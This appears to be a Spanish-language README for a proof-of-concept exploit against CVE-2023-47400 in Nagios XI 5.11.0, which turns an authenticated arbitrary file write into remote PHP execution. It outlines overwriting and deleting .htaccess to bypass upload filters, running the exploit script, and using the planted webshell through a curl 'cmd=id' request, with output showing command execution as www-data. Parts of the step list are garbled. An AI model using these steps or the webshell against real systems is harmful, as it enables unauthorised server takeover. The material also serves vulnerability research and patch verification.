
Prueba de concepto para el CVE-2023-47400
Prueba de concepto para CVE-2023-47400
Ejecución remota de código PHP autenticada mediante escritura arbitraria de archivos en Nagios XI 5.11.0
[!Note] Este PoC se basa en el aviso técnico publicado por NCC Group https://research.nccgroup.com/2023/12/13/technical-advisory-multiple-vulnerabilities-in-nagios-xi/
Este PoC sigue este proceso:
placeholder.jpg (solo con la cabecera de bytes mágicos JFIF, sin contenido)rename de Custom Includes para renombrar la imagen a .htaccess (lo que tiene el efecto de sobrescribir el archivo .htaccess existente)delete de Custom Includes para eliminar el archivo .htaccess.jpg.php)La explotación de esta vulnerabilidad conduce a la ejecución remota de código en el host de Nagios XI, evadiendo los filtros de subida de archivos (mediante filtros de firma de archivo y de extensión de archivo) y la prevención de ejecución de PHP (mediante ).
.htaccess[!Warning] Este exploit borra el archivo
<NAGIOS_WEB_ROOT>/includes/components/custom-includes/images/.htaccesspresente en el host para permitir la ejecución de código PHP.
# create a venv to dependency isolation
python3 -m venv .venv
source .venv/bin/activate
# run pip install before running the exploit
pip install -r requirements.txt
personalice el payload PHP que se depositará en la carpeta de subida de imágenes
ejecute el script del exploit:
python exploit.py
# the exploit generates a webshell and upload it with uuid as filename
[...]
INFO:cve_2023_47400:Successfuly uploaded payload at
INFO:cve_2023_47400:Usage :https://10.10.11.248/nagiosxi/includes/components/custom-includes/images/6ac234ca-8921-4e7e-a833-bf1ba03d2a3c.jpg.php
INFO:cve_2023_47400:Exploit completed successfuly
$ curl -k 'https://10.10.11.248/nagiosxi/includes/components/custom-includes/images/6ac234ca-8921-4e7e-a833-bf1ba03d2a3c.jpg.php?cmd=id' --output -
JFIF
uid=33(www-data) gid=33(www-data) groups=33(www-data),121(Debian-snmp),1001(nagios),1002(nagcmd)